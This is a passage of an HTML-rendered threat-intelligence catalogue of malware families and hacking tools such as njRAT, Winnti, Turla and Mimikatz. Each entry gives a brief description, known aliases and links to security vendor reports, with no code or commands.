</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3aWin32%2fZegost.BW">https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3aWin32%2fZegost.BW</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elise_backdoor"><a class="anchor" href="#_elise_backdoor"></a><a class="link" href="#_elise_backdoor">Elise Backdoor</a></h3>
<div class="paragraph">
<p>Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009</p>
</div>
<div class="paragraph">
<p>Elise Backdoor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Elise</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2533. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://thehackernews.com/2015/08/elise-malware-hacking.html">http://thehackernews.com/2015/08/elise-malware-hacking.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_laziok"><a class="anchor" href="#_trojan_laziok"></a><a class="link" href="#_trojan_laziok">Trojan.Laziok</a></h3>
<div class="paragraph">
<p>A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.</p>
</div>
<div class="paragraph">
<p>Trojan.Laziok is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Laziok</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2534. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector">http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_slempo"><a class="anchor" href="#_slempo"></a><a class="link" href="#_slempo">Slempo</a></h3>
<div class="paragraph">
<p>Android-based malware</p>
</div>
<div class="paragraph">
<p>Slempo is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GM-Bot</p>
</li>
<li>
<p>SlemBunk</p>
</li>
<li>
<p>Bankosy</p>
</li>
<li>
<p>Acecard</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2535. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/">https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pwobot"><a class="anchor" href="#_pwobot"></a><a class="link" href="#_pwobot">PWOBot</a></h3>
<div class="paragraph">
<p>We have discovered a malware family named PWOBot that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows executable. The malware has been witnessed affecting a number of Europe-based organizations, particularly in Poland. Additionally, the malware is delivered via a popular Polish file-sharing web service.</p>
</div>
<div class="paragraph">
<p>PWOBot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PWOLauncher</p>
</li>
<li>
<p>PWOHTTPD</p>
</li>
<li>
<p>PWOKeyLogger</p>
</li>
<li>
<p>PWOMiner</p>
</li>
<li>
<p>PWOPyExec</p>
</li>
<li>
<p>PWOQuery</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2536. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwobot-targets-european-organizations/">http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwobot-targets-european-organizations/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lost_door_rat"><a class="anchor" href="#_lost_door_rat"></a><a class="link" href="#_lost_door_rat">Lost Door RAT</a></h3>
<div class="paragraph">
<p>We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers.</p>
</div>
<div class="paragraph">
<p>Lost Door RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>LostDoor RAT</p>
</li>
<li>
<p>BKDR_LODORAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2537. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/">http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_njrat_2"><a class="anchor" href="#_njrat_2"></a><a class="link" href="#_njrat_2">njRAT</a></h3>
<div class="paragraph">
<p>njRAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Bladabindi</p>
</li>
<li>
<p>Jorik</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2538. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf">http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders/blob/master/yaraRules/njRat.yar">https://github.com/kevthehermit/RATDecoders/blob/master/yaraRules/njRat.yar</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nanocorerat"><a class="anchor" href="#_nanocorerat"></a><a class="link" href="#_nanocorerat">NanoCoreRAT</a></h3>
<div class="paragraph">
<p>NanoCoreRAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NanoCore</p>
</li>
<li>
<p>Nancrat</p>
</li>
<li>
<p>Zurten</p>
</li>
<li>
<p>Atros2.CKPN</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2539. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/nanocore-another-rat-tries-make-it-out-gutter">http://www.symantec.com/connect/blogs/nanocore-another-rat-tries-make-it-out-gutter</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nanocore.io/">https://nanocore.io/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sakula_3"><a class="anchor" href="#_sakula_3"></a><a class="link" href="#_sakula_3">Sakula</a></h3>
<div class="paragraph">
<p>Sakula is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sakurel</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2540. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/sakula-malware-family">https://www.secureworks.com/research/sakula-malware-family</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hi_zor_3"><a class="anchor" href="#_hi_zor_3"></a><a class="link" href="#_hi_zor_3">Hi-ZOR</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2541. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html">http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_derusbi_2"><a class="anchor" href="#_derusbi_2"></a><a class="link" href="#_derusbi_2">Derusbi</a></h3>
<div class="paragraph">
<p>Derusbi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TROJ_DLLSERV.BE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2542. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf">https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_evilgrab_2"><a class="anchor" href="#_evilgrab_2"></a><a class="link" href="#_evilgrab_2">EvilGrab</a></h3>
<div class="paragraph">
<p>EvilGrab is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BKDR_HGDER</p>
</li>
<li>
<p>BKDR_EVILOGE</p>
</li>
<li>
<p>BKDR_NVICM</p>
</li>
<li>
<p>Wmonder</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2543. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/">http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/06/evilgrab-delivered-by-watering-hole-attack-on-president-of-myanmars-website/">http://researchcenter.paloaltonetworks.com/2015/06/evilgrab-delivered-by-watering-hole-attack-on-president-of-myanmars-website/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_naid"><a class="anchor" href="#_trojan_naid"></a><a class="link" href="#_trojan_naid">Trojan.Naid</a></h3>
<div class="paragraph">
<p>Trojan.Naid is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Naid</p>
</li>
<li>
<p>Mdmbot.E</p>
</li>
<li>
<p>AGENT.GUNZ</p>
</li>
<li>
<p>AGENT.AQUP.DROPPER</p>
</li>
<li>
<p>AGENT.BMZA</p>
</li>
<li>
<p>MCRAT.A</p>
</li>
<li>
<p>AGENT.ABQMR</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2544. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid">https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://telussecuritylabs.com/threats/show/TSL20120614-05">http://telussecuritylabs.com/threats/show/TSL20120614-05</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moudoor"><a class="anchor" href="#_moudoor"></a><a class="link" href="#_moudoor">Moudoor</a></h3>
<div class="paragraph">
<p>Backdoor.Moudoor, a customized version of Gh0st RAT</p>
</div>
<div class="paragraph">
<p>Moudoor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SCAR</p>
</li>
<li>
<p>KillProc.14145</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2545. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.darkreading.com/attacks-breaches/elite-chinese-cyberspy-group-behind-bit9-hack/d/d-id/1140495">http://www.darkreading.com/attacks-breaches/elite-chinese-cyberspy-group-behind-bit9-hack/d/d-id/1140495</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityledger.com/2013/09/apt-for-hire-symantec-outs-hidden-lynx-hacking-crew/">https://securityledger.com/2013/09/apt-for-hire-symantec-outs-hidden-lynx-hacking-crew/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nettraveler_3"><a class="anchor" href="#_nettraveler_3"></a><a class="link" href="#_nettraveler_3">NetTraveler</a></h3>
<div class="paragraph">
<p>APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.</p>
</div>
<div class="paragraph">
<p>NetTraveler is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TravNet</p>
</li>
<li>
<p>Netfile</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2546. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/">https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winnti_2"><a class="anchor" href="#_winnti_2"></a><a class="link" href="#_winnti_2">Winnti</a></h3>
<div class="paragraph">
<p>APT used As part of Operation SMN, Novetta analyzed recent versions of the Winnti malware. The samples, compiled from mid- to late 2014, exhibited minimal functional changes over the previous generations Kaspersky reported in 2013.</p>
</div>
<div class="paragraph">
<p>Winnti is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Etso</p>
</li>
<li>
<p>SUQ</p>
</li>
<li>
<p>Agent.ALQHI</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2547. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/">https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mimikatz_2"><a class="anchor" href="#_mimikatz_2"></a><a class="link" href="#_mimikatz_2">Mimikatz</a></h3>
<div class="paragraph">
<p>Ease Credential stealh and replay, A little tool to play with Windows security.</p>
</div>
<div class="paragraph">
<p>Mimikatz is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Mikatz</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2548. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_2"><a class="anchor" href="#_webc2_2"></a><a class="link" href="#_webc2_2">WEBC2</a></h3>
<div class="paragraph">
<p>Backdoor attribued to APT1</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2549. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gnaegle/cse4990-practical3">https://github.com/gnaegle/cse4990-practical3</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.securestate.com/blog/2013/02/20/apt-if-it-aint-broke">https://www.securestate.com/blog/2013/02/20/apt-if-it-aint-broke</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pirpi"><a class="anchor" href="#_pirpi"></a><a class="link" href="#_pirpi">Pirpi</a></h3>
<div class="paragraph">
<p>Symantec has observed Buckeye activity dating back to 2009, involving attacks on various organizations in several regions. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organizations network in 2009. The group delivered Backdoor.Pirpi through malicious attachments or links in convincing spear-phishing emails.</p>
</div>
<div class="paragraph">
<p>Pirpi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Badey</p>
</li>
<li>
<p>EXL</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2550. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rarstone_2"><a class="anchor" href="#_rarstone_2"></a><a class="link" href="#_rarstone_2">RARSTONE</a></h3>
<div class="paragraph">
<p>RARSTONE is a Remote Access Tool (RAT) discovered early 2013 by TrendMicro, its characterized by a great affinity with the other RAT know as Plug is and was used in April for phishing campaigns that followed the dramatic attack to the Boston Marathon.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2551. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/">http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backspace_2"><a class="anchor" href="#_backspace_2"></a><a class="link" href="#_backspace_2">Backspace</a></h3>
<div class="paragraph">
<p>Backspace is a Backdoor that targets the Windows platform. This malware is reportedly associated with targeted attacks against Association of Southeast Asian Nations (ASEAN) members (APT30).</p>
</div>
<div class="paragraph">
<p>Backspace is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lecna</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2552. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/WEB-2015RPTAPT30.html">https://www2.fireeye.com/WEB-2015RPTAPT30.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf">https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xscontrol"><a class="anchor" href="#_xscontrol"></a><a class="link" href="#_xscontrol">XSControl</a></h3>
<div class="paragraph">
<p>Backdoor user by he Naikon APT group</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2553. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf">https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neteagle_2"><a class="anchor" href="#_neteagle_2"></a><a class="link" href="#_neteagle_2">Neteagle</a></h3>
<div class="paragraph">
<p>NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as Scout and Norton.</p>
</div>
<div class="paragraph">
<p>Neteagle is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>scout</p>
</li>
<li>
<p>norton</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2554. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0034">https://attack.mitre.org/wiki/Software/S0034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_agent_btz_2"><a class="anchor" href="#_agent_btz_2"></a><a class="link" href="#_agent_btz_2">Agent.BTZ</a></h3>
<div class="paragraph">
<p>In November 2014, the experts of the G DATA SecurityLabs published an article about ComRAT, the Agent.BTZ successor. We explained that this case is linked to the Uroburos rootkit.</p>
</div>
<div class="paragraph">
<p>Agent.BTZ is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ComRat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2555. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-from-agent-btz-to-comrat">https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-from-agent-btz-to-comrat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_heseber_bot"><a class="anchor" href="#_heseber_bot"></a><a class="link" href="#_heseber_bot">Heseber BOT</a></h3>
<div class="paragraph">
<p>RAT bundle with standard VNC (to avoid/limit A/V detection).</p>
</div>
</div>
<div class="sect2">
<h3 id="_agent_dne"><a class="anchor" href="#_agent_dne"></a><a class="link" href="#_agent_dne">Agent.dne</a></h3>
</div>
<div class="sect2">
<h3 id="_wipbot"><a class="anchor" href="#_wipbot"></a><a class="link" href="#_wipbot">Wipbot</a></h3>
<div class="paragraph">
<p>Waterbug is the name given to the actors who use the malware tools Trojan.Wipbot (also known as Tavdig and Epic Turla)</p>
</div>
<div class="paragraph">
<p>Wipbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tavdig</p>
</li>
<li>
<p>Epic Turla</p>
</li>
<li>
<p>WorldCupSec</p>
</li>
<li>
<p>TadjMakhal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2556. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf">https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turla_2"><a class="anchor" href="#_turla_2"></a><a class="link" href="#_turla_2">Turla</a></h3>
<div class="paragraph">
<p>Family of related sophisticated backdoor software - Name comes from Microsoft detection signature anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features&#8230;&#8203;for now!</p>
</div>
<div class="paragraph">
<p>Turla is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Snake</p>
</li>
<li>
<p>Uroburos</p>
</li>
<li>
<p>Urouros</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2557. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf">https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#Snake">https://objective-see.com/blog/blog_0x25.html#Snake</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winexe"><a class="anchor" href="#_winexe"></a><a class="link" href="#_winexe">Winexe</a></h3>
</div>
<div class="sect2">
<h3 id="_dark_comet"><a class="anchor" href="#_dark_comet"></a><a class="link" href="#_dark_comet">Dark Comet</a></h3>
<div class="paragraph">
<p>RAT initialy identified in 2011 and still actively used.</p>
</div>
</div>
<div class="sect2">
<h3 id="_cadelspy"><a class="anchor" href="#_cadelspy"></a><a class="link" href="#_cadelspy">Cadelspy</a></h3>
<div class="paragraph">
<p>Cadelspy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WinSpy</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_cmstar"><a class="anchor" href="#_cmstar"></a><a class="link" href="#_cmstar">CMStar</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2558. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/">http://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dhs2015"><a class="anchor" href="#_dhs2015"></a><a class="link" href="#_dhs2015">DHS2015</a></h3>
<div class="paragraph">
<p>DHS2015 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>iRAT</p>
